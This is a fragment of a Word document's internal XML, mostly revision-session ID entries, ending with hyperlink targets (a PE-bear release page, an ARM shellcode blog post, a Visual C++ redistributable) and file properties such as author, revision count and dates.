    <w:rsid w:val="00EB26A6"/>
    <w:rsid w:val="00EB26FC"/>
    <w:rsid w:val="00EB2BFE"/>
    <w:rsid w:val="00EB2E73"/>
    <w:rsid w:val="00EB3787"/>
    <w:rsid w:val="00EB4446"/>
    <w:rsid w:val="00EB447B"/>
    <w:rsid w:val="00EB44EC"/>
    <w:rsid w:val="00EB45D6"/>
    <w:rsid w:val="00EB476F"/>
    <w:rsid w:val="00EB4A96"/>
    <w:rsid w:val="00EB5297"/>
    <w:rsid w:val="00EB5452"/>
    <w:rsid w:val="00EB5472"/>
    <w:rsid w:val="00EB58A8"/>
    <w:rsid w:val="00EB59E1"/>
    <w:rsid w:val="00EB5A36"/>
    <w:rsid w:val="00EB63D5"/>
    <w:rsid w:val="00EB7D28"/>
    <w:rsid w:val="00EC0070"/>
    <w:rsid w:val="00EC0284"/>
    <w:rsid w:val="00EC04A3"/>
    <w:rsid w:val="00EC0CCC"/>
    <w:rsid w:val="00EC0E59"/>
    <w:rsid w:val="00EC14A5"/>
    <w:rsid w:val="00EC16DA"/>
    <w:rsid w:val="00EC1A40"/>
    <w:rsid w:val="00EC2892"/>
    <w:rsid w:val="00EC29B3"/>
    <w:rsid w:val="00EC29BF"/>
    <w:rsid w:val="00EC326C"/>
    <w:rsid w:val="00EC390A"/>
    <w:rsid w:val="00EC39DA"/>
    <w:rsid w:val="00EC3C5C"/>
    <w:rsid w:val="00EC63FF"/>
    <w:rsid w:val="00EC72AD"/>
    <w:rsid w:val="00EC7894"/>
    <w:rsid w:val="00EC78F6"/>
    <w:rsid w:val="00ED072E"/>
    <w:rsid w:val="00ED0827"/>
    <w:rsid w:val="00ED09EF"/>
    <w:rsid w:val="00ED0D8A"/>
    <w:rsid w:val="00ED1086"/>
    <w:rsid w:val="00ED11C2"/>
    <w:rsid w:val="00ED1944"/>
    <w:rsid w:val="00ED1945"/>
    <w:rsid w:val="00ED1CDA"/>
    <w:rsid w:val="00ED1D1B"/>
    <w:rsid w:val="00ED2906"/>
    <w:rsid w:val="00ED29D7"/>
    <w:rsid w:val="00ED2D50"/>
    <w:rsid w:val="00ED3647"/>
    <w:rsid w:val="00ED3748"/>
    <w:rsid w:val="00ED3CF3"/>
    <w:rsid w:val="00ED406B"/>
    <w:rsid w:val="00ED43FC"/>
    <w:rsid w:val="00ED520C"/>
    <w:rsid w:val="00ED5B22"/>
    <w:rsid w:val="00ED62A7"/>
    <w:rsid w:val="00ED6C11"/>
    <w:rsid w:val="00ED6C15"/>
    <w:rsid w:val="00ED6D07"/>
    <w:rsid w:val="00ED75F0"/>
    <w:rsid w:val="00ED7DDA"/>
    <w:rsid w:val="00EE0159"/>
    <w:rsid w:val="00EE02A1"/>
    <w:rsid w:val="00EE0431"/>
    <w:rsid w:val="00EE04DE"/>
    <w:rsid w:val="00EE0628"/>
    <w:rsid w:val="00EE1140"/>
    <w:rsid w:val="00EE12AB"/>
    <w:rsid w:val="00EE164A"/>
    <w:rsid w:val="00EE1DC7"/>
    <w:rsid w:val="00EE2136"/>
    <w:rsid w:val="00EE21DF"/>
    <w:rsid w:val="00EE2B68"/>
    <w:rsid w:val="00EE2D3A"/>
    <w:rsid w:val="00EE2F0E"/>
    <w:rsid w:val="00EE4429"/>
    <w:rsid w:val="00EE4F42"/>
    <w:rsid w:val="00EE527D"/>
    <w:rsid w:val="00EE5550"/>
    <w:rsid w:val="00EE69DF"/>
    <w:rsid w:val="00EE6CA0"/>
    <w:rsid w:val="00EE6DE0"/>
    <w:rsid w:val="00EE75A4"/>
    <w:rsid w:val="00EE78A5"/>
    <w:rsid w:val="00EF1226"/>
    <w:rsid w:val="00EF19FE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BF0"/>
    <w:rsid w:val="00EF4598"/>
    <w:rsid w:val="00EF49BA"/>
    <w:rsid w:val="00EF5578"/>
    <w:rsid w:val="00EF5B6C"/>
    <w:rsid w:val="00EF5BCF"/>
    <w:rsid w:val="00EF5D6B"/>
    <w:rsid w:val="00EF612D"/>
    <w:rsid w:val="00EF6509"/>
    <w:rsid w:val="00EF6BB7"/>
    <w:rsid w:val="00F00270"/>
    <w:rsid w:val="00F0060D"/>
    <w:rsid w:val="00F01225"/>
    <w:rsid w:val="00F01228"/>
    <w:rsid w:val="00F012F7"/>
    <w:rsid w:val="00F01876"/>
    <w:rsid w:val="00F0208E"/>
    <w:rsid w:val="00F022E1"/>
    <w:rsid w:val="00F025AB"/>
    <w:rsid w:val="00F04578"/>
    <w:rsid w:val="00F05620"/>
    <w:rsid w:val="00F05A11"/>
    <w:rsid w:val="00F06163"/>
    <w:rsid w:val="00F065CB"/>
    <w:rsid w:val="00F06655"/>
    <w:rsid w:val="00F067D1"/>
    <w:rsid w:val="00F072A1"/>
    <w:rsid w:val="00F07DB7"/>
    <w:rsid w:val="00F10844"/>
    <w:rsid w:val="00F1088E"/>
    <w:rsid w:val="00F10CC2"/>
    <w:rsid w:val="00F10DFC"/>
    <w:rsid w:val="00F10EC2"/>
    <w:rsid w:val="00F11541"/>
    <w:rsid w:val="00F11589"/>
    <w:rsid w:val="00F11A08"/>
    <w:rsid w:val="00F12432"/>
    <w:rsid w:val="00F13088"/>
    <w:rsid w:val="00F13BB7"/>
    <w:rsid w:val="00F13F36"/>
    <w:rsid w:val="00F1450C"/>
    <w:rsid w:val="00F151F9"/>
    <w:rsid w:val="00F15790"/>
    <w:rsid w:val="00F15D03"/>
    <w:rsid w:val="00F1666B"/>
    <w:rsid w:val="00F16C34"/>
    <w:rsid w:val="00F172F0"/>
    <w:rsid w:val="00F174A5"/>
    <w:rsid w:val="00F17DC2"/>
    <w:rsid w:val="00F200A7"/>
    <w:rsid w:val="00F2096D"/>
    <w:rsid w:val="00F20DAC"/>
    <w:rsid w:val="00F211A7"/>
    <w:rsid w:val="00F21A9E"/>
    <w:rsid w:val="00F22A46"/>
    <w:rsid w:val="00F22B62"/>
    <w:rsid w:val="00F22F60"/>
    <w:rsid w:val="00F2304F"/>
    <w:rsid w:val="00F2315E"/>
    <w:rsid w:val="00F233ED"/>
    <w:rsid w:val="00F236DF"/>
    <w:rsid w:val="00F2428B"/>
    <w:rsid w:val="00F246C2"/>
    <w:rsid w:val="00F24998"/>
    <w:rsid w:val="00F24EDD"/>
    <w:rsid w:val="00F2563B"/>
    <w:rsid w:val="00F256CE"/>
    <w:rsid w:val="00F259AC"/>
    <w:rsid w:val="00F25C28"/>
    <w:rsid w:val="00F25D0D"/>
    <w:rsid w:val="00F26D18"/>
    <w:rsid w:val="00F27B43"/>
    <w:rsid w:val="00F31424"/>
    <w:rsid w:val="00F3180C"/>
    <w:rsid w:val="00F31E5A"/>
    <w:rsid w:val="00F31FDB"/>
    <w:rsid w:val="00F32B01"/>
    <w:rsid w:val="00F3400E"/>
    <w:rsid w:val="00F3413A"/>
    <w:rsid w:val="00F35006"/>
    <w:rsid w:val="00F3503A"/>
    <w:rsid w:val="00F352E8"/>
    <w:rsid w:val="00F35875"/>
    <w:rsid w:val="00F35880"/>
    <w:rsid w:val="00F35913"/>
    <w:rsid w:val="00F359B7"/>
    <w:rsid w:val="00F36382"/>
    <w:rsid w:val="00F3660F"/>
    <w:rsid w:val="00F368AE"/>
    <w:rsid w:val="00F372FC"/>
    <w:rsid w:val="00F3749E"/>
    <w:rsid w:val="00F375ED"/>
    <w:rsid w:val="00F3770E"/>
    <w:rsid w:val="00F37824"/>
    <w:rsid w:val="00F37B1E"/>
    <w:rsid w:val="00F40FFF"/>
    <w:rsid w:val="00F41019"/>
    <w:rsid w:val="00F41370"/>
    <w:rsid w:val="00F414E6"/>
    <w:rsid w:val="00F41FBD"/>
    <w:rsid w:val="00F424BD"/>
    <w:rsid w:val="00F426FC"/>
    <w:rsid w:val="00F42869"/>
    <w:rsid w:val="00F42A98"/>
    <w:rsid w:val="00F43B9D"/>
    <w:rsid w:val="00F441C9"/>
    <w:rsid w:val="00F442CF"/>
    <w:rsid w:val="00F4430D"/>
    <w:rsid w:val="00F443E6"/>
    <w:rsid w:val="00F4469E"/>
    <w:rsid w:val="00F44B39"/>
    <w:rsid w:val="00F458B7"/>
    <w:rsid w:val="00F47118"/>
    <w:rsid w:val="00F47795"/>
    <w:rsid w:val="00F47AE6"/>
    <w:rsid w:val="00F510AA"/>
    <w:rsid w:val="00F5159F"/>
    <w:rsid w:val="00F51627"/>
    <w:rsid w:val="00F5171A"/>
    <w:rsid w:val="00F520BF"/>
    <w:rsid w:val="00F5217B"/>
    <w:rsid w:val="00F5227B"/>
    <w:rsid w:val="00F5362F"/>
    <w:rsid w:val="00F5402E"/>
    <w:rsid w:val="00F5431D"/>
    <w:rsid w:val="00F547B0"/>
    <w:rsid w:val="00F54819"/>
    <w:rsid w:val="00F54882"/>
    <w:rsid w:val="00F54B6A"/>
    <w:rsid w:val="00F54F41"/>
    <w:rsid w:val="00F54F4C"/>
    <w:rsid w:val="00F55060"/>
    <w:rsid w:val="00F55776"/>
    <w:rsid w:val="00F558AE"/>
    <w:rsid w:val="00F55E73"/>
    <w:rsid w:val="00F56332"/>
    <w:rsid w:val="00F575B5"/>
    <w:rsid w:val="00F576A2"/>
    <w:rsid w:val="00F577C9"/>
    <w:rsid w:val="00F60397"/>
    <w:rsid w:val="00F60565"/>
    <w:rsid w:val="00F60699"/>
    <w:rsid w:val="00F60F68"/>
    <w:rsid w:val="00F6190F"/>
    <w:rsid w:val="00F61980"/>
    <w:rsid w:val="00F61FA2"/>
    <w:rsid w:val="00F62637"/>
    <w:rsid w:val="00F6276A"/>
    <w:rsid w:val="00F62828"/>
    <w:rsid w:val="00F63997"/>
    <w:rsid w:val="00F63DA8"/>
    <w:rsid w:val="00F647DA"/>
    <w:rsid w:val="00F64896"/>
    <w:rsid w:val="00F64CD1"/>
    <w:rsid w:val="00F64F55"/>
    <w:rsid w:val="00F654A4"/>
    <w:rsid w:val="00F654C8"/>
    <w:rsid w:val="00F65649"/>
    <w:rsid w:val="00F657F2"/>
    <w:rsid w:val="00F65C5E"/>
    <w:rsid w:val="00F65C9C"/>
    <w:rsid w:val="00F65EBF"/>
    <w:rsid w:val="00F666BC"/>
    <w:rsid w:val="00F66D88"/>
    <w:rsid w:val="00F66F99"/>
    <w:rsid w:val="00F67898"/>
    <w:rsid w:val="00F6791F"/>
    <w:rsid w:val="00F7025B"/>
    <w:rsid w:val="00F70470"/>
    <w:rsid w:val="00F704CD"/>
    <w:rsid w:val="00F7077D"/>
    <w:rsid w:val="00F72199"/>
    <w:rsid w:val="00F72530"/>
    <w:rsid w:val="00F72B54"/>
    <w:rsid w:val="00F72EA0"/>
    <w:rsid w:val="00F7327C"/>
    <w:rsid w:val="00F73524"/>
    <w:rsid w:val="00F74C40"/>
    <w:rsid w:val="00F74E7E"/>
    <w:rsid w:val="00F74EBB"/>
    <w:rsid w:val="00F75303"/>
    <w:rsid w:val="00F75B1A"/>
    <w:rsid w:val="00F762DE"/>
    <w:rsid w:val="00F766AB"/>
    <w:rsid w:val="00F76E80"/>
    <w:rsid w:val="00F772F5"/>
    <w:rsid w:val="00F775E1"/>
    <w:rsid w:val="00F80406"/>
    <w:rsid w:val="00F80796"/>
    <w:rsid w:val="00F81A90"/>
    <w:rsid w:val="00F81D7D"/>
    <w:rsid w:val="00F82352"/>
    <w:rsid w:val="00F8242D"/>
    <w:rsid w:val="00F825AA"/>
    <w:rsid w:val="00F8279F"/>
    <w:rsid w:val="00F82E92"/>
    <w:rsid w:val="00F834C8"/>
    <w:rsid w:val="00F83A48"/>
    <w:rsid w:val="00F8461D"/>
    <w:rsid w:val="00F84A3B"/>
    <w:rsid w:val="00F84D4B"/>
    <w:rsid w:val="00F852A5"/>
    <w:rsid w:val="00F856C7"/>
    <w:rsid w:val="00F858E5"/>
    <w:rsid w:val="00F8606E"/>
    <w:rsid w:val="00F86761"/>
    <w:rsid w:val="00F872D8"/>
    <w:rsid w:val="00F874DF"/>
    <w:rsid w:val="00F8763C"/>
    <w:rsid w:val="00F878B0"/>
    <w:rsid w:val="00F900DD"/>
    <w:rsid w:val="00F904AC"/>
    <w:rsid w:val="00F90C1F"/>
    <w:rsid w:val="00F90C5E"/>
    <w:rsid w:val="00F91092"/>
    <w:rsid w:val="00F910DE"/>
    <w:rsid w:val="00F91534"/>
    <w:rsid w:val="00F91A77"/>
    <w:rsid w:val="00F91ADB"/>
    <w:rsid w:val="00F91C0F"/>
    <w:rsid w:val="00F91E30"/>
    <w:rsid w:val="00F91F38"/>
    <w:rsid w:val="00F92048"/>
    <w:rsid w:val="00F92259"/>
    <w:rsid w:val="00F923B4"/>
    <w:rsid w:val="00F92BD3"/>
    <w:rsid w:val="00F92CC9"/>
    <w:rsid w:val="00F933A6"/>
    <w:rsid w:val="00F934D6"/>
    <w:rsid w:val="00F93893"/>
    <w:rsid w:val="00F93DEA"/>
    <w:rsid w:val="00F93F08"/>
    <w:rsid w:val="00F94202"/>
    <w:rsid w:val="00F946B6"/>
    <w:rsid w:val="00F94776"/>
    <w:rsid w:val="00F95683"/>
    <w:rsid w:val="00F95752"/>
    <w:rsid w:val="00F957DC"/>
    <w:rsid w:val="00F9595F"/>
    <w:rsid w:val="00F95CA0"/>
    <w:rsid w:val="00F96492"/>
    <w:rsid w:val="00F96553"/>
    <w:rsid w:val="00F96EF7"/>
    <w:rsid w:val="00F97846"/>
    <w:rsid w:val="00FA0686"/>
    <w:rsid w:val="00FA088D"/>
    <w:rsid w:val="00FA0D97"/>
    <w:rsid w:val="00FA0EED"/>
    <w:rsid w:val="00FA1138"/>
    <w:rsid w:val="00FA17EF"/>
    <w:rsid w:val="00FA186A"/>
    <w:rsid w:val="00FA1FFC"/>
    <w:rsid w:val="00FA275B"/>
    <w:rsid w:val="00FA298B"/>
    <w:rsid w:val="00FA2B6C"/>
    <w:rsid w:val="00FA32BD"/>
    <w:rsid w:val="00FA35D8"/>
    <w:rsid w:val="00FA38AE"/>
    <w:rsid w:val="00FA3C19"/>
    <w:rsid w:val="00FA41D6"/>
    <w:rsid w:val="00FA49A0"/>
    <w:rsid w:val="00FA4A9A"/>
    <w:rsid w:val="00FA5418"/>
    <w:rsid w:val="00FA5462"/>
    <w:rsid w:val="00FA5A36"/>
    <w:rsid w:val="00FA60DB"/>
    <w:rsid w:val="00FA617B"/>
    <w:rsid w:val="00FA6D8A"/>
    <w:rsid w:val="00FA6EC2"/>
    <w:rsid w:val="00FA7776"/>
    <w:rsid w:val="00FA7D6C"/>
    <w:rsid w:val="00FB110D"/>
    <w:rsid w:val="00FB12FA"/>
    <w:rsid w:val="00FB16E5"/>
    <w:rsid w:val="00FB3468"/>
    <w:rsid w:val="00FB35D0"/>
    <w:rsid w:val="00FB3B03"/>
    <w:rsid w:val="00FB40ED"/>
    <w:rsid w:val="00FB44D3"/>
    <w:rsid w:val="00FB4587"/>
    <w:rsid w:val="00FB45F5"/>
    <w:rsid w:val="00FB4BB3"/>
    <w:rsid w:val="00FB4E13"/>
    <w:rsid w:val="00FB4EA1"/>
    <w:rsid w:val="00FB4F22"/>
    <w:rsid w:val="00FB51CC"/>
    <w:rsid w:val="00FB547C"/>
    <w:rsid w:val="00FB5D74"/>
    <w:rsid w:val="00FB621C"/>
    <w:rsid w:val="00FB6769"/>
    <w:rsid w:val="00FC020E"/>
    <w:rsid w:val="00FC177D"/>
    <w:rsid w:val="00FC195B"/>
    <w:rsid w:val="00FC19D6"/>
    <w:rsid w:val="00FC22BA"/>
    <w:rsid w:val="00FC23AF"/>
    <w:rsid w:val="00FC2836"/>
    <w:rsid w:val="00FC352E"/>
    <w:rsid w:val="00FC3EA9"/>
    <w:rsid w:val="00FC4083"/>
    <w:rsid w:val="00FC47EF"/>
    <w:rsid w:val="00FC4907"/>
    <w:rsid w:val="00FC5213"/>
    <w:rsid w:val="00FC52E0"/>
    <w:rsid w:val="00FC5D90"/>
    <w:rsid w:val="00FC6FCB"/>
    <w:rsid w:val="00FC71E6"/>
    <w:rsid w:val="00FC752E"/>
    <w:rsid w:val="00FC790F"/>
    <w:rsid w:val="00FD0240"/>
    <w:rsid w:val="00FD0567"/>
    <w:rsid w:val="00FD05CF"/>
    <w:rsid w:val="00FD0B27"/>
    <w:rsid w:val="00FD0E02"/>
    <w:rsid w:val="00FD1227"/>
    <w:rsid w:val="00FD12F1"/>
    <w:rsid w:val="00FD1301"/>
    <w:rsid w:val="00FD134B"/>
    <w:rsid w:val="00FD1515"/>
    <w:rsid w:val="00FD17DF"/>
    <w:rsid w:val="00FD34B0"/>
    <w:rsid w:val="00FD34B6"/>
    <w:rsid w:val="00FD3810"/>
    <w:rsid w:val="00FD3D89"/>
    <w:rsid w:val="00FD3F20"/>
    <w:rsid w:val="00FD40C2"/>
    <w:rsid w:val="00FD41B0"/>
    <w:rsid w:val="00FD48EF"/>
    <w:rsid w:val="00FD49BE"/>
    <w:rsid w:val="00FD49E7"/>
    <w:rsid w:val="00FD4C49"/>
    <w:rsid w:val="00FD4C51"/>
    <w:rsid w:val="00FD55C0"/>
    <w:rsid w:val="00FD6950"/>
    <w:rsid w:val="00FD6F99"/>
    <w:rsid w:val="00FD75D0"/>
    <w:rsid w:val="00FD7BB5"/>
    <w:rsid w:val="00FD7C7D"/>
    <w:rsid w:val="00FE062A"/>
    <w:rsid w:val="00FE06CF"/>
    <w:rsid w:val="00FE073D"/>
    <w:rsid w:val="00FE0C24"/>
    <w:rsid w:val="00FE10B1"/>
    <w:rsid w:val="00FE13C3"/>
    <w:rsid w:val="00FE299C"/>
    <w:rsid w:val="00FE30C8"/>
    <w:rsid w:val="00FE3341"/>
    <w:rsid w:val="00FE383B"/>
    <w:rsid w:val="00FE3BC5"/>
    <w:rsid w:val="00FE40E1"/>
    <w:rsid w:val="00FE41BD"/>
    <w:rsid w:val="00FE4905"/>
    <w:rsid w:val="00FE5157"/>
    <w:rsid w:val="00FE5C94"/>
    <w:rsid w:val="00FE5CAF"/>
    <w:rsid w:val="00FE5E4D"/>
    <w:rsid w:val="00FE5F5D"/>
    <w:rsid w:val="00FE69C3"/>
    <w:rsid w:val="00FE6AB0"/>
    <w:rsid w:val="00FE6BB4"/>
    <w:rsid w:val="00FE7AB5"/>
    <w:rsid w:val="00FE7CA8"/>
    <w:rsid w:val="00FE7CAA"/>
    <w:rsid w:val="00FF060E"/>
    <w:rsid w:val="00FF19A6"/>
    <w:rsid w:val="00FF1CE0"/>
    <w:rsid w:val="00FF1D23"/>
    <w:rsid w:val="00FF21B0"/>
    <w:rsid w:val="00FF2650"/>
    <w:rsid w:val="00FF2C4E"/>
    <w:rsid w:val="00FF2F11"/>
    <w:rsid w:val="00FF3006"/>
    <w:rsid w:val="00FF430F"/>
    <w:rsid w:val="00FF475F"/>
    <w:rsid w:val="00FF4DEE"/>
    <w:rsid w:val="00FF50A5"/>
    <w:rsid w:val="00FF50A7"/>
    <w:rsid w:val="00FF5421"/>
    <w:rsid w:val="00FF5888"/>
    <w:rsid w:val="00FF6601"/>
    <w:rsid w:val="00FF6A0D"/>
    <w:rsid w:val="00FF6A38"/>
    <w:rsid w:val="00FF6C2C"/>
    <w:rsid w:val="00FF733F"/>
    <w:rsid w:val="00FF7354"/>
    <w:rsid w:val="00FF74BB"/>
    <w:rsid w:val="00FF76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E1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9B60FE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hasherezade/pe-bear/tree/v0.6.7.3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s://shell-storm.org/blog/Shellcode-On-ARM-Architecture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aka.ms/vs/17/release/vc_redist.x64.exe" TargetMode="External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9</TotalTime>
  <Pages>19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Spectre Hunter</cp:lastModifiedBy>
  <cp:revision>6170</cp:revision>
  <cp:lastPrinted>2022-02-19T00:46:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-31T16:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-05T23:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>